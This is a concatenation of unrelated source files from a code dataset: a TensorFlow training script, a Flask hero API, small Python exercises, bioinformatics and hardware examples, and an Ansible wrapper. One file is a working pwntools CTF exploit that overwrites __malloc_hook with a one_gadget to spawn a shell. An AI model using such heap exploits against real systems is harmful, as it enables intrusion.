tf.nn.conv2d(conv1, w_2, strides = [1, 1, 1, 1], padding = 'SAME') + b_2\n\n # batch norm 2\n batch_mean_2, batch_var_2 = tf.nn.moments(conv2, [0, 1, 2])\n conv2 = (conv2 - batch_mean_2) / (tf.sqrt(batch_var_2) + 1e-5)\n \n # relu 2\n conv2 = tf.nn.relu(conv2)\n \n # max_pool_2\n conv2 = tf.nn.max_pool(conv2, ksize = [1, 3, 3, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n\n w_3 = self.weight_variable('w_3', [filter_size, filter_size, n_filters_2, n_filters_3])\n b_3 = self.bias_variable('b_3', [n_filters_3])\n \n # conv3\n conv3 = tf.nn.conv2d(conv2, w_3, strides = [1, 1, 1, 1], padding = 'SAME') + b_3\n\n # batch norm 3\n batch_mean_3, batch_var_3 = tf.nn.moments(conv3, [0, 1, 2])\n conv3 = (conv3 - batch_mean_3) / (tf.sqrt(batch_var_3) + 1e-5)\n \n # relu 3\n conv3 = tf.nn.relu(conv3)\n\n \n \n # fc 1\n conv_flat = tf.reshape(conv3, [-1, 8 * 8 * n_filters_3]) # 8192=8*8*128\n\n w_4 = self.weight_variable('w_4', [8 * 8 * n_filters_3, n_units])\n b_4 = self.bias_variable('b_4', [n_units])\n \n fc = tf.matmul(conv_flat, w_4) + b_4\n\n # bn1_fc\n batch_mean, batch_var = tf.nn.moments(fc, [0])\n bn1_fc = (fc - batch_mean) / (tf.sqrt(batch_var) + 1e-5)\n\n # relu\n fc = tf.nn.relu(bn1_fc)\n\n # dropout\n fc = tf.nn.dropout(fc, keep_prob)\n \n \n # leaky relu\n #fc = tf.maximum(0.2 * fc, fc)\n \n feature = fc\n return feature\n\n def classifier_1(self, \n x, \n n_units_1, \n n_units_2, \n #keep_prob, \n reuse = False):\n \n with tf.variable_scope('classifier_1', reuse = reuse):\n w_1 = self.weight_variable('w_1', [n_units_1, n_units_2])\n b_1 = self.bias_variable('b_1', [n_units_2])\n \n fc = tf.matmul(x, w_1) + b_1\n\n # batch norm\n batch_mean, batch_var = tf.nn.moments(fc, [0])\n fc = (fc - batch_mean) / (tf.sqrt(batch_var) + 1e-5)\n \n # relu\n fc = tf.nn.relu(fc)\n \n w_2 = self.weight_variable('w_2', [n_units_2, 10])\n b_2 = self.bias_variable('b_2', [10])\n \n fc = tf.matmul(fc, w_2) + b_2\n \n #dropout\n #fc = tf.nn.dropout(fc, keep_prob)\n\n logits = fc\n return logits\n\n def classifier_2(self, \n x, \n n_units_1, \n n_units_2, \n #keep_prob, \n reuse = False):\n \n with tf.variable_scope('classifier_2', reuse = reuse):\n \n w_1 = self.weight_variable('w_1', [n_units_1, n_units_2])\n b_1 = self.bias_variable('b_1', [n_units_2])\n \n fc = tf.matmul(x, w_1) + b_1\n\n # batch norm\n batch_mean, batch_var = tf.nn.moments(fc, [0])\n fc = (fc - batch_mean) / (tf.sqrt(batch_var) + 1e-5)\n \n # relu\n fc = tf.nn.relu(fc)\n \n w_2 = self.weight_variable('w_2', [n_units_2, 10])\n b_2 = self.bias_variable('b_2', [10])\n \n fc = tf.matmul(fc, w_2) + b_2\n \n #dropout\n #fc = tf.nn.dropout(fc, keep_prob)\n\n logits = fc\n return logits\n\n def loss_cross_entropy(self, logits, labels):\n cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels))\n return cross_entropy\n\n def discrepancy(self, probs_1, probs_2):\n return tf.reduce_mean(tf.abs(probs_1 - probs_2)) \n\n def accuracy(self, y, t):\n correct_preds = tf.equal(tf.argmax(y, axis = 1), tf.argmax(t, axis = 1))\n accuracy = tf.reduce_mean(tf.cast(correct_preds, tf.float32))\n return accuracy\n\n def training(self, loss, learning_rate, var_list):\n #optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate)\n #optimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate)\n optimizer = tf.train.MomentumOptimizer(learning_rate = learning_rate, momentum = 0.9)\n train_step = optimizer.minimize(loss, var_list = var_list)\n return train_step\n\n def training_clipped(self, loss, 
learning_rate, clip_norm, var_list):\n optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate)\n\n grads_and_vars = optimizer.compute_gradients(loss, var_list = var_list)\n clipped_grads_and_vars = [(tf.clip_by_norm(grad, clip_norm = clip_norm), \\\n var) for grad, var in grads_and_vars]\n train_step = optimizer.apply_gradients(clipped_grads_and_vars)\n\n return train_step\n\n def train(self, images_train_1, labels_train_1, images_test_1, labels_test_1, \\\n images_train_t, labels_train_t, images_test_t, labels_test_t, \\\n filter_size, n_filters_1, n_filters_2, n_filters_3, n_units_g, n_units_c, \\\n learning_rate, epoch, num_stepC, batch_size, show_step, is_saving, model_path):\n \n tf.reset_default_graph()\n\n x_1 = tf.placeholder(shape = [None, 32 * 32], dtype = tf.float32)\n y_1 = tf.placeholder(shape = [None, 10], dtype = tf.float32)\n x_t = tf.placeholder(shape = [None, 32 * 32], dtype = tf.float32)\n y_t = tf.placeholder(shape = [None, 10], dtype = tf.float32)\n keep_prob = tf.placeholder(shape = (), dtype = tf.float32)\n\n feat_1 = self.generator(x_1, filter_size, n_filters_1, n_filters_2, n_filters_3, n_units_g, \\\n keep_prob, reuse = False)\n feat_t = self.generator(x_t, filter_size, n_filters_1, n_filters_2, n_filters_3, n_units_g, \\\n keep_prob, reuse = True)\n\n logits_1_1 = self.classifier_1(feat_1, n_units_g, n_units_c, reuse = False)\n probs_1_1 = tf.nn.softmax(logits_1_1)\n loss_1_1 = self.loss_cross_entropy(logits_1_1, y_1)\n\n logits_1_t = self.classifier_1(feat_t, n_units_g, n_units_c, reuse = True)\n probs_1_t = tf.nn.softmax(logits_1_t)\n loss_1_t = self.loss_cross_entropy(logits_1_t, y_t)\n\n logits_2_1 = self.classifier_2(feat_1, n_units_g, n_units_c, reuse = False)\n probs_2_1 = tf.nn.softmax(logits_2_1)\n loss_2_1 = self.loss_cross_entropy(logits_2_1, y_1)\n\n logits_2_t = self.classifier_2(feat_t, n_units_g, n_units_c, reuse = True)\n probs_2_t = tf.nn.softmax(logits_2_t)\n loss_2_t = self.loss_cross_entropy(logits_2_t, y_t)\n\n loss_a = loss_1_1 + loss_2_1\n #loss_b = - self.discrepancy(probs_1_t, probs_2_t)\n loss_b = loss_a - self.discrepancy(probs_1_t, probs_2_t)\n loss_c = self.discrepancy(probs_1_t, probs_2_t)\n\n var_list_g = tf.trainable_variables('generator')\n var_list_c_1 = tf.trainable_variables('classifier_1')\n var_list_c_2 = tf.trainable_variables('classifier_2')\n\n var_list_a = var_list_g + var_list_c_1 + var_list_c_2\n var_list_b = var_list_c_1 + var_list_c_2\n var_list_c = var_list_g\n\n # Without Gradient Clipping\n train_step_a = self.training(loss_a, learning_rate, var_list_a)\n train_step_b = self.training(loss_b, learning_rate, var_list_b)\n train_step_c = self.training(loss_c, learning_rate, var_list_c)\n\n acc_1_1 = self.accuracy(probs_1_1, y_1)\n acc_1_t = self.accuracy(probs_1_t, y_t)\n acc_2_1 = self.accuracy(probs_2_1, y_1)\n acc_2_t = self.accuracy(probs_2_t, y_t)\n\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n sess.run(init)\n\n history_loss_train_1_1 = []\n history_loss_train_1_t = []\n history_loss_train_2_1 = []\n history_loss_train_2_t = []\n\n history_loss_test_1_1 = []\n history_loss_test_1_t = []\n history_loss_test_2_1 = []\n history_loss_test_2_t = []\n\n history_acc_train_1_1 = []\n history_acc_train_1_t = []\n history_acc_train_2_1 = []\n history_acc_train_2_t = []\n\n history_acc_test_1_1 = []\n history_acc_test_1_t = []\n history_acc_test_2_1 = []\n history_acc_test_2_t = []\n\n history_loss_train_a = []\n history_loss_train_b = []\n 
history_loss_train_c = []\n\n history_loss_test_a = []\n history_loss_test_b = []\n history_loss_test_c = []\n \n get_source_batch = batch_generator(images_train_1, labels_train_1, batch_size, shuffle=True)\n get_target_batch = batch_generator(images_train_t, labels_train_t, batch_size, shuffle=True)\n \n test_source_batch = batch_generator(images_test_1, labels_test_1, batch_size, shuffle=False)\n test_target_batch = batch_generator(images_test_t, labels_test_t, batch_size, shuffle=False)\n \n \n #n_iter = images_train_1.shape[0]//batch_size\n n_iter = images_train_t.shape[0]//batch_size\n print('number of batches for training: {}'.format(n_iter))\n \n iter_total = -1\n best_acc_classifier1 = 0\n best_acc_classifier2 = 0\n show_numbers = 0\n #cur_model_name = 'MCD_net_{}'.format(int(time.time()))\n \n # variables for plot\n source_acc_train1 = []\n source_acc_train2 = []\n target_acc_train1 = []\n target_acc_train2 = []\n \n source_acc_test1 = []\n source_acc_test2 = []\n target_acc_test1 = []\n target_acc_test2 = []\n \n for epc in range(epoch):\n print(\"epoch {} \".format(epc + 1))\n\n for i in range(n_iter):\n iter_total += 1\n \n x_train_batch, y_train_batch = next(get_source_batch)\n x_target_batch, y_target_batch = next(get_target_batch)\n \n # Train\n # Step A\n feed_A_dict = {x_1: x_train_batch, y_1: y_train_batch, keep_prob: 0.5} #0.8\n sess.run(train_step_a, feed_dict = feed_A_dict)\n\n # Step B\n feed_B_dict = {x_1: x_train_batch, y_1: y_train_batch, x_t: x_target_batch, keep_prob: 0.5} #0.8\n sess.run(train_step_b, feed_dict = feed_B_dict)\n\n # Step C\n for n_c in range(num_stepC):\n feed_C_dict = {x_t: x_target_batch, keep_prob: 0.5} #0.75\n sess.run(train_step_c, feed_dict = feed_C_dict) \n \n\n # Checking\n \"\"\"\n # Train data\n rand_index = np.random.choice(len(images_train_1), size = batch_size)\n x_batch_1 = images_train_1[rand_index]\n y_batch_1 = labels_train_1[rand_index]\n\n rand_index = np.random.choice(len(images_train_t), size = batch_size)\n x_batch_t = images_train_t[rand_index]\n y_batch_t = labels_train_t[rand_index]\n\n feed_dict = {x_1: x_batch_1, y_1: y_batch_1, x_t: x_batch_t, y_t: y_batch_t, keep_prob: 0.8} #0.8\n\n temp_loss_train_1_1 = sess.run(loss_1_1, feed_dict = feed_dict)\n temp_loss_train_1_t = sess.run(loss_1_t, feed_dict = feed_dict)\n temp_loss_train_2_1 = sess.run(loss_2_1, feed_dict = feed_dict)\n temp_loss_train_2_t = sess.run(loss_2_t, feed_dict = feed_dict)\n\n temp_acc_train_1_1 = sess.run(acc_1_1, feed_dict = feed_dict)\n temp_acc_train_1_t = sess.run(acc_1_t, feed_dict = feed_dict)\n temp_acc_train_2_1 = sess.run(acc_2_1, feed_dict = feed_dict)\n temp_acc_train_2_t = sess.run(acc_2_t, feed_dict = feed_dict)\n\n history_loss_train_1_1.append(temp_loss_train_1_1)\n history_loss_train_1_t.append(temp_loss_train_1_t)\n history_loss_train_2_1.append(temp_loss_train_2_1)\n history_loss_train_2_t.append(temp_loss_train_2_t)\n\n history_acc_train_1_1.append(temp_acc_train_1_1)\n history_acc_train_1_t.append(temp_acc_train_1_t)\n history_acc_train_2_1.append(temp_acc_train_2_1)\n history_acc_train_2_t.append(temp_acc_train_2_t)\n\n temp_loss_train_a = sess.run(loss_a, feed_dict = feed_dict)\n temp_loss_train_b = sess.run(loss_b, feed_dict = feed_dict)\n temp_loss_train_c = sess.run(loss_c, feed_dict = feed_dict)\n\n history_loss_train_a.append(temp_loss_train_a)\n history_loss_train_b.append(temp_loss_train_b)\n history_loss_train_c.append(temp_loss_train_c)\n\n # Test data\n rand_index = np.random.choice(len(images_test_1), size = 
batch_size)\n x_batch_1 = images_test_1[rand_index]\n y_batch_1 = labels_test_1[rand_index]\n\n rand_index = np.random.choice(len(images_test_t), size = batch_size)\n x_batch_t = images_test_t[rand_index]\n y_batch_t = labels_test_t[rand_index]\n\n feed_dict = {x_1: x_batch_1, y_1: y_batch_1, x_t: x_batch_t, y_t: y_batch_t, keep_prob: 0.8} #0.8\n\n temp_loss_test_1_1 = sess.run(loss_1_1, feed_dict = feed_dict)\n temp_loss_test_1_t = sess.run(loss_1_t, feed_dict = feed_dict)\n temp_loss_test_2_1 = sess.run(loss_2_1, feed_dict = feed_dict)\n temp_loss_test_2_t = sess.run(loss_2_t, feed_dict = feed_dict)\n\n temp_acc_test_1_1 = sess.run(acc_1_1, feed_dict = feed_dict)\n temp_acc_test_1_t = sess.run(acc_1_t, feed_dict = feed_dict)\n temp_acc_test_2_1 = sess.run(acc_2_1, feed_dict = feed_dict)\n temp_acc_test_2_t = sess.run(acc_2_t, feed_dict = feed_dict)\n\n history_loss_test_1_1.append(temp_loss_test_1_1)\n history_loss_test_1_t.append(temp_loss_test_1_t)\n history_loss_test_2_1.append(temp_loss_test_2_1)\n history_loss_test_2_t.append(temp_loss_test_2_t)\n\n history_acc_test_1_1.append(temp_acc_test_1_1)\n history_acc_test_1_t.append(temp_acc_test_1_t)\n history_acc_test_2_1.append(temp_acc_test_2_1)\n history_acc_test_2_t.append(temp_acc_test_2_t)\n\n temp_loss_test_a = sess.run(loss_a, feed_dict = feed_dict)\n temp_loss_test_b = sess.run(loss_b, feed_dict = feed_dict)\n temp_loss_test_c = sess.run(loss_c, feed_dict = feed_dict)\n\n history_loss_test_a.append(temp_loss_test_a)\n history_loss_test_b.append(temp_loss_test_b)\n history_loss_test_c.append(temp_loss_test_c)\n \"\"\"\n \n if i % show_step == 0:\n show_numbers += 1\n print ('-' * 15)\n # do validation\n # Accurancy\n acc_source_test1 = 0\n acc_source_test2 = 0\n acc_target_test1 = 0\n acc_target_test2 = 0\n \n acc_source_train1 = 0\n acc_source_train2 = 0\n acc_target_train1 = 0\n acc_target_train2 = 0\n # Loss\n loss_test_a = 0\n loss_test_b = 0\n loss_test_c = 0\n \n for acc_n in range(n_iter):\n #test\n \n x_train_batch, y_train_batch = next(test_source_batch)\n x_target_batch, y_target_batch = next(test_target_batch)\n \n feed_test_dict = {x_1: x_train_batch, y_1: y_train_batch, \n x_t: x_target_batch, y_t: y_target_batch, keep_prob: 0.8} #0.8\n \n acc_source_test1 += sess.run(acc_1_1, feed_dict=feed_test_dict)\n acc_source_test2 += sess.run(acc_2_1, feed_dict=feed_test_dict)\n acc_target_test1 += sess.run(acc_1_t, feed_dict=feed_test_dict)\n acc_target_test2 += sess.run(acc_2_t, feed_dict=feed_test_dict)\n \n loss_test_a += sess.run(loss_a, feed_dict = feed_test_dict)\n loss_test_b += sess.run(loss_b, feed_dict = feed_test_dict)\n loss_test_c += sess.run(loss_c, feed_dict = feed_test_dict)\n \n #train\n x_train_batch, y_train_batch = next(get_source_batch)\n x_target_batch, y_target_batch = next(get_target_batch)\n \n feed_test_dict = {x_1: x_train_batch, y_1: y_train_batch, \n x_t: x_target_batch, y_t: y_target_batch, keep_prob: 0.5} #0.8\n \n acc_source_train1 += sess.run(acc_1_1, feed_dict=feed_test_dict)\n acc_source_train2 += sess.run(acc_2_1, feed_dict=feed_test_dict)\n acc_target_train1 += sess.run(acc_1_t, feed_dict=feed_test_dict)\n acc_target_train2 += sess.run(acc_2_t, feed_dict=feed_test_dict)\n \n acc_source_test1 /= n_iter\n acc_source_test2 /= n_iter\n acc_target_test1 /= n_iter\n acc_target_test2 /= n_iter\n \n acc_source_train1 /= n_iter\n acc_source_train2 /= n_iter\n acc_target_train1 /= n_iter\n acc_target_train2 /= n_iter\n \n source_acc_test1.append(acc_source_test1) \n 
source_acc_test2.append(acc_source_test2)\n target_acc_test1.append(acc_target_test1)\n target_acc_test2.append(acc_target_test2)\n \n source_acc_train1.append(acc_source_train1)\n source_acc_train2.append(acc_source_train2)\n target_acc_train1.append(acc_target_train1)\n target_acc_train2.append(acc_target_train2)\n\n\n loss_test_a /= n_iter\n loss_test_b /= n_iter\n loss_test_c /= n_iter\n \n \n \"\"\"\n if verbose:\n print('{}/{} loss: {} validation accuracy : {}%'.format(\n batch_size * (i + 1),\n X_train.shape[0],\n cur_loss,\n valid_acc))\n \n # save the merge result summary\n writer.add_summary(merge_result, iter_total)\n \"\"\"\n print(\"Iteration: {}, Loss_test_a: {}, Loss_test_b: {}, Loss_test_c: {}\".format(iter_total, \n loss_test_a, \n loss_test_b,\n loss_test_c))\n print(\"Source test acc1: {}%, Source test acc2: {}%.\".format(100*acc_source_test1,\n 100*acc_source_test2))\n\n\n # when achieve the best validation accuracy, we store the model paramters\n \n if acc_target_test1 > best_acc_classifier1:\n print('Best test accuracy classifier1! Iteration:{} accuracy: {}%'.format(iter_total,\n 100*acc_target_test1))\n best_acc_classifier1 = acc_target_test1\n if acc_target_test2 > best_acc_classifier2:\n print('Best test accuracy classifier2! Iteration:{} accuracy: {}%'.format(iter_total,\n 100*acc_target_test2))\n best_acc_classifier2 = acc_target_test2\n \n #saver.save(sess, 'model/{}'.format(cur_model_name))\n\n \n #print(\"Traning ends. The best test accuracy is classifier1: {}, classifier2: {}. Model named {}.\".format(best_acc_classifier1, best_acc_classifier1, cur_model_name))\n print(\"Traning ends. The best test accuracy is classifier1: {}%, classifier2: {}%.\".format(100*best_acc_classifier1, 100*best_acc_classifier2))\n\n print ('-'* 15) \n fig = plt.figure(figsize = (10, 3))\n ax1 = fig.add_subplot(1, 2, 1)\n ax1.plot(range(show_numbers), source_acc_train1, 'b-', label = 'Source train acc')\n ax1.plot(range(show_numbers), source_acc_test1, 'r--', label = 'Source test acc')\n ax1.set_title('Classifier1 Acc for Source Data')\n ax1.legend(loc = 'lower right')\n\n ax2 = fig.add_subplot(1, 2, 2)\n ax2.plot(range(show_numbers), target_acc_train1, 'b-', label = 'Target train acc')\n ax2.plot(range(show_numbers), target_acc_test1, 'r--', label = 'Target test acc')\n ax2.set_ylim(0.0, 1.0)\n ax2.set_title('Classifier1 Acc for Target Data')\n ax2.legend(loc = 'lower right')\n\n plt.show()\n\n print ('-'* 15) \n fig = plt.figure(figsize = (10, 3))\n ax1 = fig.add_subplot(1, 2, 1)\n ax1.plot(range(show_numbers), source_acc_train2, 'b-', label = 'Source train acc')\n ax1.plot(range(show_numbers), source_acc_test2, 'r--', label = 'Source test acc')\n ax1.set_title('Classifier2 Acc for Source Data')\n ax1.legend(loc = 'lower right')\n\n ax2 = fig.add_subplot(1, 2, 2)\n ax2.plot(range(show_numbers), target_acc_train2, 'b-', label = 'Target train acc')\n ax2.plot(range(show_numbers), target_acc_test2, 'r--', label = 'Target test acc')\n ax2.set_ylim(0.0, 1.0)\n ax2.set_title('Classifier2 Acc for Target Data')\n ax2.legend(loc = 'lower right')\n\n plt.show()\n\n ","sub_path":"mcd_svhn2mnist.py","file_name":"mcd_svhn2mnist.py","file_ext":"py","file_size_in_byte":26663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"473842270","text":"from flask import Blueprint, request, jsonify\nfrom comic_book.helpers import token_required\nfrom comic_book.models import db, User, Hero, hero_schema, heroes_schema\n\napi = Blueprint('api', __name__, 
url_prefix = '/api')\n\n@api.route('/getheroes')\n@token_required\ndef get_data(current_user_token):\n return { 'List' : 'Heroes'}\n\n\n# Create Hero\n\n@api.route('/heroes', methods = ['POST'])\n@token_required\ndef create_hero(current_user_token):\n name = request.json['name']\n team = request.json['team']\n league = request.json['league']\n position = request.json['position']\n rating = request.json['rating']\n user_token = current_user_token.token\n\n hero = Hero(name, team, league, position, rating, user_token)\n db.session.add(hero)\n db.session.commit()\n\n response = hero_schema.dump(hero)\n return jsonify(response)\n\n# Retrieve all Heroes\n\n@api.route('/heroes', methods = ['GET'])\n@token_required\ndef get_heroes(current_user_token):\n owner = current_user_token.token\n heroes = Hero.query.filter_by(user_token = owner).all()\n response = heroes_schema.dump(heroes)\n return jsonify(response)\n\n\n# Retrieve a Hero\n\n@api.route('/heroes/', methods = ['GET'])\n@token_required\ndef get_hero(current_user_token, id):\n owner = current_user_token.token\n if owner == current_user_token.token:\n hero = Hero.query.get(id)\n response = hero_schema.dump(hero)\n return jsonify(response)\n else:\n return jsonify({'message' : 'Valid Token Required'}), 401\n\n# Update Hero\n\n@api.route('/heroes/', methods = ['POST', 'PUT'])\n@token_required\ndef update_hero(current_user_token, id):\n hero = Hero.query.get(id) \n\n hero.name = request.json['name']\n hero.team = request.json['team']\n hero.league = request.json['league']\n hero.position = request.json['position']\n hero.rating = request.json['rating']\n hero.user_token = current_user_token.token\n\n db.session.commit()\n response = hero_schema.dump(hero)\n return jsonify(response)\n\n\n# Delete Hero\n\n@api.route('/heroes/', methods = ['DELETE'])\n@token_required\ndef delete_hero(current_user_token, id):\n hero = Hero.query.get(id)\n db.session.delete(hero)\n db.session.commit()\n\n response = hero_schema.dump(hero)\n return jsonify(response)","sub_path":"comic_book/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"373799854","text":"'''Write a function called describe_city() that accepts the name of a city\r\nand its country. The function should print a simple message, such as\r\nReykjavik is in Iceland. 
Give the parameter for the country a default value.\r\nCall your function for three different cities, at least one that is not\r\nin the default country.'''\r\n\r\ndef describe_city(city, country=\"Spain\"):\r\n\t\tprint(city + \" is in \" + country)\r\n\t\r\ndescribe_city(\"Malaga\")\r\ndescribe_city(\"Granada\")\r\ndescribe_city(\"Amsterdam\", \"Holland\")\r\n\r\n","sub_path":"cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"537529536","text":"from pwn import * \nsh = process(\"./popping_caps\") \nlibc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\") \n\ndef get_PIE(proc):\n memory_map = open(\"/proc/{}/maps\".format(proc.pid),\"rb\").readlines()\n return int(memory_map[0].split(\"-\")[0],16)\n\ndef debug(bp):\n #bp = [0xea0,0xd31,0xc52]\n #bp = [0x00000dfb,0x00000b7c,0x00000d10]\n script = \"\"\n PIE = get_PIE(sh)\n PAPA = PIE\n for x in bp:\n script += \"b *0x%x\\n\"%(PIE+x)\n gdb.attach(sh,gdbscript=script) \n\ndef add(size) : \n sh.recv() \n sh.sendline(\"1\") \n sh.recv()\n sh.sendline(str(size)) \n\ndef free(id) : \n sh.recv() \n sh.sendline(\"2\") \n sh.recv() \n sh.sendline(str(id))\n\ndef edit(content) : \n sh.recv() \n sh.sendline(\"3\") \n sh.recv() \n sh.send(content) \n\nsh.recvuntil(\"Here is system \") \nsystem = eval(sh.recv(14)) \n\nlibc.address = system - libc.sym['system']\nmalloc_hook = libc.sym['__malloc_hook']\none_gadget = libc.address + 0x10a38c \n\nlog.success(\"System = \" + hex(system)) \nlog.success(\"Libc = \" + hex(libc.address))\n\n# debug([0xc13, 0xc49, 0xbd5]) \nadd(0x3a8) \nfree(0) # set fake size \nfree(-0x210) # free fake size \nadd(0xF8) \nedit(p64(malloc_hook)) # \nadd(0x18) # dup to malloc hook \nedit(p64(one_gadget)) \n\nsh.interactive()","sub_path":"Pwnable/ctf/csaw/popping_cars.py","file_name":"popping_cars.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"326727120","text":"__author__ = 'shmakovs'\n\nimport subprocess\n\ndef GetStartStopStrand(LineStart, LineStop, OffsetStart, OffsetStop):\n\n if LineStop < LineStart:\n LineStart += OffsetStart\n LineStop -= OffsetStop\n\n return max(1, LineStop), LineStart, \"minus\"\n\n LineStart -= OffsetStart\n LineStop += OffsetStop\n\n return max(1, LineStart), LineStop, \"plus\"\n\ndef GetRRNAPositions(HitsFileName, LengthFileName, OrgToRRNADict):\n RRNALen = 0\n for Line in open(LengthFileName):\n RRNALen = int(Line[:-1].split(\"\\t\")[1])\n\n for Line in open(HitsFileName):\n LineValues = Line[:-1].split(\"\\t\")\n Contig = LineValues[HITS_CONTIG]\n if \"|\" in Contig:\n Contig = Contig.split(\"|\")[1]\n\n OrgID = ContigToOrgDict[Contig]\n if OrgID not in OrgToRRNADict:\n OrgToRRNADict[OrgID] = [0, 0, 0, \"\", \"\"] # Start, Stop, Score, Strand, ContigID\n\n if int(LineValues[HITS_BITSCORE]) > OrgToRRNADict[OrgID][2]:\n Start, Stop, Strand = GetStartStopStrand(int(LineValues[HITS_START]), int(LineValues[HITS_STOP]),\n int(LineValues[HITS_OFFSET_START]), RRNALen - int(LineValues[HITS_OFFSET_STOP]))\n OrgToRRNADict[OrgID] = [Start, Stop, int(LineValues[HITS_BITSCORE]), Strand, Contig]#, LineValues[7]]\n\n return OrgToRRNADict\n\n\nContigToOrgDict = dict()\nfor Line in open(\"OrganismToContig.tsv\"):\n LineValues = Line[:-1].split(\"\\t\")\n ContigToOrgDict[LineValues[1]] = LineValues[0]\n\nHITS_BITSCORE = 10\nHITS_CONTIG = 1\nHITS_START = 3\nHITS_STOP = 4\nHITS_OFFSET_START = 
8\nHITS_OFFSET_STOP = 9\n\nOrgToRRNADict = dict()\n\nHitsFileName = \"EcoliRNA.hits_good_0807\"\nLengthFileName = \"EcoliRRNA.len\"\nOrgToRRNADict = GetRRNAPositions(HitsFileName, LengthFileName, OrgToRRNADict)\n\nHitsFileName = \"PyrococcusRRNA.hits_good_0807\"\nLengthFileName = \"PyrococcusRRNA.len\"\nOrgToRRNADict = GetRRNAPositions(HitsFileName, LengthFileName, OrgToRRNADict)\n\ncount = 0\nwith open(\"16sRRNA.fna\", \"a\") as RNAFile:\n for OrgID in OrgToRRNADict:\n count += 1\n print(str(count) + \"\\t\" + \"\\t\".join([str(x) for x in OrgToRRNADict[OrgID]]))\n TmpFileName = \"tmp.fna\"\n subprocess.call(\n \"blastdbcmd -db /panfs/pan1/prokdata/db/all1603.nt -entry \" + OrgToRRNADict[OrgID][4] +\n \" -range \" + str(OrgToRRNADict[OrgID][0]) + \"-\" + str(OrgToRRNADict[OrgID][1]) + \" -strand \" + OrgToRRNADict[OrgID][3] + \" > \" + TmpFileName, shell = True)\n\n for Line in open(TmpFileName):\n if Line[0] == \">\":\n RNAFile.write(\">\" + OrgID + \"\\n\")\n else:\n RNAFile.write(Line)","sub_path":"CRISPRRate/TypeIII/GetFnaSequences.py","file_name":"GetFnaSequences.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"375221532","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nHOST = \"localhost\"\nPORT = 4223\nUID = \"XYZ\" # Change XYZ to the UID of your Multi Touch Bricklet\n\nfrom tinkerforge.ip_connection import IPConnection\nfrom tinkerforge.bricklet_multi_touch import BrickletMultiTouch\n\nif __name__ == \"__main__\":\n ipcon = IPConnection() # Create IP connection\n mt = BrickletMultiTouch(UID, ipcon) # Create device object\n\n ipcon.connect(HOST, PORT) # Connect to brickd\n # Don't use device before ipcon is connected\n\n # Get current touch state\n state = mt.get_touch_state()\n s = \"\"\n\n if state & (1 << 12):\n s += \"In proximity, \"\n\n if (state & 0xfff) == 0:\n s += \"No electrodes touched\"\n else:\n s += \"Electrodes \"\n for i in range(12):\n if state & (1 << i):\n s += str(i) + \" \"\n s += \"touched\"\n\n print(s)\n\n raw_input(\"Press key to exit\\n\") # Use input() in Python 3\n ipcon.disconnect()\n","sub_path":"scripts/tinkerforge_python/examples/bricklet/multi_touch/example_simple.py","file_name":"example_simple.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"178845975","text":"if __name__ == '__main__':\n from pino.ino import Arduino, Comport, PinMode\n from pino.config import Config\n from time import sleep\n\n # com = Comport().set_baudrate(115200) \\\n # .set_port(\"/dev/ttyACM0\") \\\n # .set_inofile(\"$HOME/Experimental/pino/example/proto.ino\") \\\n # .deploy() \\\n # .connect(1.15)\n\n # loop = 10\n # interval = 0.5\n\n config = Config(\"./example/config.yml\")\n com = Comport() \\\n .apply_settings(config.get_comport()) \\\n .deploy() \\\n .connect()\n\n arduino = Arduino(com)\n arduino.set_pinmode(9, PinMode.SERVO)\n\n variables = config.get_experimental()\n loop = variables.get(\"loop\", 10)\n interval = variables.get(\"interval\", 0.5)\n\n for _ in range(loop):\n arduino.servo_rotate(9, 0)\n sleep(interval)\n arduino.servo_rotate(9, 90)\n sleep(interval)\n","sub_path":"example/servo.py","file_name":"servo.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"431810076","text":"\"\"\"\n\"\"\"\nimport collections\nimport operator\nimport os\n\nimport 
ansible.playbook\nfrom ansible import callbacks as ansible_callbacks\nfrom ansible import utils\n\nfrom . import logging\n\n\nclass PlayBook(object):\n\n @classmethod\n def factory(cls, playbook, inventory=None, stats=None, callbacks=None,\n runner_callbacks=None, check=False, host_list=None,\n limit=None, extra_vars=None, skip_tags=None,\n only_tags=[\"all\"], logger=None):\n \"\"\"\n Create and return an ansible,playbook.PlayBook instance.\n :inventory: Ansible Inventory instance to setup.\n :limit: A dictionary or list of dictionaries limiting the PlayBook.\n Example:\n {\"hostname\": \"server\", \"ip\": \"1.2.3.4\"}\n or\n [{\"hostname\": \"server1\", \"ip\": \"1.2.3.4\"},\n {\"hostname\": \"server2\", \"ip\": \"1.2.3.5\"}]\n :extra_vars: A dictionary of unicode string keys and values that are\n passed as extra variables to the playbook.\n :only_tags: A list of tags to run in the playbook. Defaults to all.\n :skip_tags: A list of tags to skip in the playbook.\n\n Notes: PlayBook is created, but not run. Generally if something isn't\n passed to the factory it'll use similar behavior to the\n ansible-playbook command-line script.\n \"\"\"\n if logger:\n logging.use_logger(logger)\n deps = PlayBook._setup(playbook, inventory, stats, callbacks,\n runner_callbacks, host_list, limit)\n return ansible.playbook.PlayBook(\n playbook=deps.playbook,\n inventory=deps.inventory,\n stats=deps.stats,\n 